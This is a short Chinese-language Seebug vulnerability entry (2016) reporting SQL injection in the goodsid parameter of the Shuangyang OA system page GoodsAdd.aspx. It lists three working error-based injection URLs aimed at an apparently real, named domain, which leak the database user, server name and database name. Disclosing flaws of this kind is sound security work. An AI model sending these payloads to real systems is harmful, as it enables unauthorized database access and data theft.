双杨OA系统 /DSOA_TY/goods/GoodsAdd.aspx SQL注入漏洞

2016-01-21T00:00:00
ID SSV:90549
Type seebug
Reporter jackstraw
Modified 2016-01-21T00:00:00

Description

双杨OA系统/DSOA_TY/goods/GoodsAdd.aspx SQL注入漏洞

注入参数 goodsid

http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1%20and%201=user&flag=2 http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1%20and%201=@@SERVERNAME&flag=2 http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1%20and%201=db_name(0)&flag=2